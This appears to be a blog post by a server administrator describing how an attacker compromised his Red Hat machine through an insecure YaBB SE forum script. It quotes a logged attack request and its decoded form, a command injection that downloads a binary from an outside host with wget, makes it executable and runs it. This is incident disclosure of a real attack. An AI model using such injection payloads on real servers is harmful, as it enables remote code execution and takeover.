In recent months I’ve attracted the attentions of a hacker from Brazil, and until a few days ago this proved to be a real pain in the ass, especially as the exploit he was using doesn’t seem to be widely documented on the web.
Finally I managed to close the hole, but after I had tried all the following:
- shutdown all non-essential services on RH 7.3
- shutdown FTP
- reset all passwords
- removed GCC from my system as the hacker was gaining access and compiling further C exploits
- almost having had to change machines!
I was still getting compromised. At first I thought this bastard was just a bot that automatically detected a security hole and was sending automated attacks. But recently looking at his .bash_history I realised I had a fairy persistent pest on my hands.
Anyways, the security hole ended up being quite simple, wished I had discovered it earlier. Turns out one of my users was running the http://www.yabbse.org/ forum script, quite possibly one of the most insecure examples of professional PHP programming about. I present the details here in the hope they will help some write more secure scripts.
The request that the hacker was using to compromise the server was the following:
[root@www logs]# cat access_log | grep spc1
22.214.171.124 – – [25/Oct/2003:16:43:42 -0700] “GET /fishbowl/Sources/Packages.php?
%20wget%20http://brlink.net/db/spc1;%20chmod%20777%20spc1;%20./spc1 HTTP/1.1″ 200
255 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90)”
Put through a little urldecode you get:
/var/tmp/.xpl; cd /var/tmp/.xpl; wget http://brlink.net/db/spc1; chmod 777 spc1; ./spc1
Check out the cat.txt, it’s an interesting idea. Looks like yabbse script presented a nice exec() or system() call for anyone to do what they wanted with. I would estimate PHP programmers learn to treat these functions with caution within their first 3 months of exposure to the language, that’s if they have no prior development experience. What’s strange is that yabbsee, currently in version 1.5.4 with quite a professional website, let this *censored*up slip through.
Many thanks to Nick Rembis who pointed me in the right direction to closing this hole.